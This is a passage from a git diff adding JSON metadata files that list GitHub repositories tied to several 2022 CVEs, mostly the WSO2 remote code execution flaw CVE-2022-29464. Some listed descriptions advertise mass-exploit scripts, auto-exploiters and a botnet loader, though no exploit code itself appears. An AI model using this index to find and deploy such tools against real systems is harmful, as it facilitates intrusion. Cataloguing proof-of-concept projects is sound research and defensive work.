"CVE-2022-29455", + "full_name": "tucommenceapousser\/CVE-2022-29455", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2022-29455", + "description": null, + "fork": false, + "created_at": "2023-06-01T01:40:08Z", + "updated_at": "2023-06-01T01:42:09Z", + "pushed_at": "2023-06-01T01:46:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 647998526, + "name": "CVE-2022-29455-mass", + "full_name": "tucommenceapousser\/CVE-2022-29455-mass", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2022-29455-mass", + "description": null, + "fork": false, + "created_at": "2023-06-01T01:44:45Z", + "updated_at": "2023-06-01T01:44:57Z", + "pushed_at": "2023-06-01T01:44:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29464.json b/2022/CVE-2022-29464.json new file mode 100644 index 0000000000..e396811be6 --- /dev/null +++ b/2022/CVE-2022-29464.json @@ -0,0 +1,941 @@ +[ + { + "id": 483817548, + "name": "CVE-2022-29464", + "full_name": "hakivvi\/CVE-2022-29464", + "owner": { + "login": "hakivvi", + "id": 67718634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4", + "html_url": "https:\/\/github.com\/hakivvi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hakivvi\/CVE-2022-29464", + "description": "WSO2 RCE (CVE-2022-29464) exploit and writeup.", + "fork": false, + "created_at": "2022-04-20T21:23:52Z", + "updated_at": "2024-11-18T20:38:59Z", + "pushed_at": "2022-04-27T05:52:43Z", + "stargazers_count": 370, + "watchers_count": 370, + "has_discussions": false, + "forks_count": 90, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-29464" + ], + "visibility": "public", + "forks": 90, + "watchers": 370, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 483938215, + "name": "wso2-rce-cve-2022-29464", + "full_name": "tufanturhan\/wso2-rce-cve-2022-29464", + "owner": { + "login": "tufanturhan", + "id": 49189594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49189594?v=4", + "html_url": "https:\/\/github.com\/tufanturhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tufanturhan\/wso2-rce-cve-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-04-21T06:48:35Z", + "updated_at": "2022-04-21T11:01:48Z", + "pushed_at": "2022-04-21T06:48:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484091052, + "name": "WSO2-CVE-2022-29464", + "full_name": "mr-r3bot\/WSO2-CVE-2022-29464", + "owner": { + "login": "mr-r3bot", + "id": 37280106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37280106?v=4", + "html_url": "https:\/\/github.com\/mr-r3bot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3bot\/WSO2-CVE-2022-29464", + "description": "Pre-auth RCE bug CVE-2022-29464", + "fork": false, + "created_at": "2022-04-21T14:47:18Z", + "updated_at": "2022-04-25T02:27:06Z", + "pushed_at": "2022-04-26T08:36:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484263730, + "name": "cve-2022-29464", + "full_name": "Lidong-io\/cve-2022-29464", + "owner": { + "login": "Lidong-io", + "id": 59634396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59634396?v=4", + "html_url": "https:\/\/github.com\/Lidong-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lidong-io\/cve-2022-29464", + "description": "cve-2022-29464 批量脚本", + "fork": false, + "created_at": "2022-04-22T02:01:39Z", + "updated_at": "2024-05-31T15:21:35Z", + "pushed_at": "2022-04-22T02:09:42Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484305098, + "name": "CVE-2022-29464", + "full_name": "hev0x\/CVE-2022-29464", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2022-29464", + "description": "WSO2 RCE (CVE-2022-29464) ", + "fork": false, + "created_at": "2022-04-22T05:19:51Z", + "updated_at": "2024-01-03T02:45:36Z", + "pushed_at": "2022-04-28T05:18:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484575423, + "name": "nmap-CVE-2022-29464", + "full_name": "gpiechnik2\/nmap-CVE-2022-29464", + "owner": { + "login": "gpiechnik2", + "id": 48253270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48253270?v=4", + "html_url": "https:\/\/github.com\/gpiechnik2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gpiechnik2\/nmap-CVE-2022-29464", + "description": " Repository containing nse script for vulnerability CVE-2022-29464 known as WSO2 RCE.", + "fork": false, + "created_at": "2022-04-22T21:23:57Z", + "updated_at": "2024-08-12T20:22:40Z", + "pushed_at": "2022-04-22T22:38:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-29464", + "nmap", + "nmap-scripts", + "nse", + "rce", + "wso2" + ], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484585504, + "name": "CVE-2022-29464", + "full_name": "0xAgun\/CVE-2022-29464", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-04-22T22:13:45Z", + "updated_at": "2024-08-12T20:22:40Z", + "pushed_at": "2022-04-22T22:15:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485106940, + "name": "WSOB", + "full_name": "oppsec\/WSOB", + "owner": { + "login": "oppsec", + "id": 50470310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470310?v=4", + "html_url": "https:\/\/github.com\/oppsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oppsec\/WSOB", + "description": "😭 WSOB is a python tool created to exploit the new vulnerability on WSO2 assigned as CVE-2022-29464.", + "fork": false, + "created_at": "2022-04-24T18:25:26Z", + "updated_at": "2024-11-27T15:15:42Z", + "pushed_at": "2023-05-23T03:42:31Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-29464", + "exploit", + "python", + "wso2" + ], + "visibility": "public", + "forks": 11, + "watchers": 26, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485156953, + "name": "CVE-2022-29464", + "full_name": "n3rdh4x0r\/CVE-2022-29464", + "owner": { + "login": "n3rdh4x0r", + "id": 66146701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", + "html_url": "https:\/\/github.com\/n3rdh4x0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-04-24T22:40:38Z", + "updated_at": "2022-04-24T22:41:21Z", + "pushed_at": "2022-04-24T22:56:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485645944, + "name": "cve-2022-29464", + "full_name": "lowkey0808\/cve-2022-29464", + "owner": { + "login": "lowkey0808", + "id": 49674960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4", + "html_url": "https:\/\/github.com\/lowkey0808", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lowkey0808\/cve-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-04-26T05:28:39Z", + "updated_at": "2022-04-26T08:33:33Z", + "pushed_at": "2022-04-26T08:33:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 486893955, + "name": "CVE-2022-29464", + "full_name": "superzerosec\/CVE-2022-29464", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2022-29464", + "description": "CVE-2022-29464 POC exploit", + "fork": false, + "created_at": "2022-04-29T08:24:17Z", + "updated_at": "2022-05-12T01:54:14Z", + "pushed_at": "2022-04-30T16:44:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 488850414, + "name": "CVE-2022-29464", + "full_name": "axin2019\/CVE-2022-29464", + "owner": { + "login": "axin2019", + "id": 65283021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65283021?v=4", + "html_url": "https:\/\/github.com\/axin2019", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axin2019\/CVE-2022-29464", + "description": "1", + "fork": false, + "created_at": "2022-05-05T06:02:52Z", + "updated_at": "2022-05-07T00:49:13Z", + "pushed_at": "2022-05-05T06:06:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 489552311, + "name": "CVE-2022-29464", + "full_name": "LinJacck\/CVE-2022-29464", + "owner": { + "login": "LinJacck", + "id": 57176639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57176639?v=4", + "html_url": "https:\/\/github.com\/LinJacck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LinJacck\/CVE-2022-29464", + "description": "cve-2022-29464 EXP", + "fork": false, + "created_at": "2022-05-07T03:00:08Z", + "updated_at": "2022-10-02T15:23:43Z", + "pushed_at": "2022-05-07T03:31:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 492434082, + "name": "CVE-2022-29464-loader", + "full_name": "Inplex-sys\/CVE-2022-29464-loader", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-29464-loader", + "description": "A bots loader for CVE-2022-29464 with multithreading", + "fork": false, + "created_at": "2022-05-15T08:51:16Z", + "updated_at": "2024-11-06T23:17:18Z", + "pushed_at": "2022-08-08T15:31:54Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "botnet", + "cve-2022-29464", + "loader", + "rce", + "wso2-vuln", + "wso2exploit", + "wso2rce" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 496760787, + "name": "CVE-2022-29464", + "full_name": "Chocapikk\/CVE-2022-29464", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-29464", + "description": "Python script to exploit CVE-2022-29464 (mass mode)", + "fork": false, + "created_at": "2022-05-26T20:19:53Z", + "updated_at": "2024-08-12T20:23:35Z", + "pushed_at": "2022-06-01T03:29:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499883723, + "name": "Better-CVE-2022-29464", + "full_name": "jimidk\/Better-CVE-2022-29464", + "owner": { + "login": "jimidk", + "id": 59735128, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59735128?v=4", + "html_url": "https:\/\/github.com\/jimidk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jimidk\/Better-CVE-2022-29464", + "description": "CVE-2022-29464 PoC for WSO2 products", + "fork": false, + "created_at": "2022-06-04T16:46:52Z", + "updated_at": "2024-11-25T04:18:25Z", + "pushed_at": "2022-06-04T17:55:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 506404115, + "name": "Mass-exploit-CVE-2022-29464", + "full_name": "electr0lulz\/Mass-exploit-CVE-2022-29464", + "owner": { + "login": "electr0lulz", + "id": 106660834, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106660834?v=4", + "html_url": "https:\/\/github.com\/electr0lulz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/electr0lulz\/Mass-exploit-CVE-2022-29464", + "description": "Mass Exploit for CVE 2022-29464 on Carbon", + "fork": false, + "created_at": "2022-06-22T20:58:33Z", + "updated_at": "2024-08-12T20:24:23Z", + "pushed_at": "2022-06-22T23:54:38Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "auto-exploiter", + "bash", + "carbon", + "cve", + "cve-2022-29464", + "exploit", + "massexploit", + "python", + "shodan" + ], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 508111135, + "name": "CVE-2022-29464", + "full_name": "xinghonghaoyue\/CVE-2022-29464", + "owner": { + "login": "xinghonghaoyue", + "id": 95838336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95838336?v=4", + "html_url": "https:\/\/github.com\/xinghonghaoyue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xinghonghaoyue\/CVE-2022-29464", + "description": "Python script to exploit CVE-2022-29464 (mass mode)", + "fork": false, + "created_at": "2022-06-28T01:10:41Z", + "updated_at": "2022-06-06T07:41:41Z", + "pushed_at": "2022-06-28T01:11:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 510649929, + "name": "WSO2RCE", + "full_name": "Pasch0\/WSO2RCE", + "owner": { + "login": "Pasch0", + "id": 78447612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78447612?v=4", + "html_url": "https:\/\/github.com\/Pasch0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pasch0\/WSO2RCE", + "description": "CVE-2022-29464 Exploit", + "fork": false, + "created_at": "2022-07-05T08:27:04Z", + "updated_at": "2023-11-12T16:10:10Z", + "pushed_at": "2023-11-29T17:37:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520007959, + "name": "-CVE-2022-29464", + "full_name": "r4x0r1337\/-CVE-2022-29464", + "owner": { + "login": "r4x0r1337", + "id": 99073650, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99073650?v=4", + "html_url": "https:\/\/github.com\/r4x0r1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4x0r1337\/-CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-08-01T07:27:29Z", + "updated_at": "2022-10-24T03:11:43Z", + "pushed_at": "2023-02-28T08:57:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 524474931, + "name": "CVE-2022-29464", + "full_name": "amit-pathak009\/CVE-2022-29464", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:14:43Z", + "updated_at": "2022-05-19T21:24:13Z", + "pushed_at": "2022-05-19T21:24:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 524475053, + "name": "CVE-2022-29464-mass", + "full_name": "amit-pathak009\/CVE-2022-29464-mass", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2022-29464-mass", + "description": null, + "fork": false, + "created_at": "2022-08-13T18:15:18Z", + "updated_at": "2024-08-12T20:26:10Z", + "pushed_at": "2022-05-29T19:16:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 540011346, + "name": "CVE-2022-29464", + "full_name": "hupe1980\/CVE-2022-29464", + "owner": { + "login": "hupe1980", + "id": 24973437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hupe1980\/CVE-2022-29464", + "description": "WSO2 Arbitrary File Upload to Remote Command Execution (RCE)", + "fork": false, + "created_at": "2022-09-22T14:04:49Z", + "updated_at": "2022-09-27T04:16:55Z", + "pushed_at": "2022-09-25T07:58:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-29464", + "wso2" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 565982204, + "name": "CVE-2022-29464", + "full_name": "gbrsh\/CVE-2022-29464", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2022-29464", + "description": "RCE exploit for WSO2", + "fork": false, + "created_at": "2022-11-14T18:22:41Z", + "updated_at": "2024-01-04T23:27:19Z", + "pushed_at": "2022-11-14T18:24:56Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579590994, + "name": "CVE-2022-29464", + "full_name": "devengpk\/CVE-2022-29464", + "owner": { + "login": "devengpk", + "id": 41437020, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41437020?v=4", + "html_url": "https:\/\/github.com\/devengpk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devengpk\/CVE-2022-29464", + "description": null, + "fork": false, + "created_at": "2022-12-18T07:44:43Z", + "updated_at": "2022-12-18T08:03:14Z", + "pushed_at": "2022-12-18T08:07:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 632383541, + "name": "CVE-2022-29464", + "full_name": "ThatNotEasy\/CVE-2022-29464", + "owner": { + "login": "ThatNotEasy", + "id": 25004320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4", + "html_url": "https:\/\/github.com\/ThatNotEasy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2022-29464", + "description": "Perform With Mass Exploits In WSO Management.", + "fork": false, + "created_at": "2023-04-25T09:45:18Z", + "updated_at": "2024-08-12T20:31:02Z", + "pushed_at": "2023-07-24T22:21:30Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "administrator-privileges", + "auto-exploiter", + "wso2" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709455861, + "name": "CVE-2022-29464", + "full_name": "Pushkarup\/CVE-2022-29464", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2022-29464", + "description": "A PoC and Exploit for CVE 2022-29464", + "fork": false, + "created_at": "2023-10-24T18:54:09Z", + "updated_at": "2023-10-26T19:21:35Z", + "pushed_at": "2023-10-25T03:54:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719704174, + "name": "CVE-2022-29464", + "full_name": "SynixCyberCrimeMy\/CVE-2022-29464", + "owner": { + "login": "SynixCyberCrimeMy", + "id": 151055664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151055664?v=4", + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SynixCyberCrimeMy\/CVE-2022-29464", + "description": "SynixCyberCrimeMY CVE Exploiter By SamuraiMelayu1337 & ?\/h4zzzzzz.scc", + "fork": false, + "created_at": "2023-11-16T18:16:29Z", + "updated_at": "2023-11-16T18:18:22Z", + "pushed_at": "2023-11-16T18:32:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812068172, + "name": "CVE-2022-29464", + "full_name": "cc3305\/CVE-2022-29464", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2022-29464", + "description": "CVE-2022-29464 exploit script", + "fork": false, + "created_at": "2024-06-07T22:17:05Z", + "updated_at": "2024-07-27T20:18:09Z", + "pushed_at": "2024-07-27T20:18:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29465.json b/2022/CVE-2022-29465.json new file mode 100644 index 0000000000..42dc5f40cd --- /dev/null +++ b/2022/CVE-2022-29465.json @@ -0,0 +1,33 @@ +[ + { + "id": 491506547, + "name": "CVE-2022-29465", + "full_name": "badguy233\/CVE-2022-29465", + "owner": { + "login": "badguy233", + "id": 22237869, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22237869?v=4", + "html_url": "https:\/\/github.com\/badguy233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badguy233\/CVE-2022-29465", + "description": "CVE-2022-29464", + "fork": false, + "created_at": "2022-05-12T12:34:29Z", + "updated_at": "2022-05-10T03:31:12Z", + "pushed_at": "2022-04-30T05:10:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29469.json b/2022/CVE-2022-29469.json new file mode 100644 index 0000000000..e01239b405 --- /dev/null +++ b/2022/CVE-2022-29469.json @@ -0,0 +1,33 @@ +[ + { + "id": 719237611, + "name": "CVE-2022-29469", + "full_name": "S4muraiMelayu1337\/CVE-2022-29469", + "owner": { + "login": "S4muraiMelayu1337", + "id": 130330296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130330296?v=4", + "html_url": "https:\/\/github.com\/S4muraiMelayu1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4muraiMelayu1337\/CVE-2022-29469", + "description": null, + "fork": false, + "created_at": "2023-11-15T18:47:44Z", + "updated_at": "2023-11-15T18:49:58Z", + "pushed_at": "2023-11-15T18:51:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-29548.json b/2022/CVE-2022-29548.json new file mode 100644 index 0000000000..46b6a86736 --- /dev/null +++ b/2022/CVE-2022-29548.json @@ -0,0 +1,33 @@ +[ + { + "id": 484939365, + "name": "CVE-2022-29548", + "full_name": "cxosmo\/CVE-2022-29548", + "owner": { + "login": "cxosmo", + "id": 45860802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45860802?v=4", + "html_url": "https:\/\/github.com\/cxosmo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxosmo\/CVE-2022-29548", + "description": "Proof of concept exploit for CVE-2022-29548: A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; 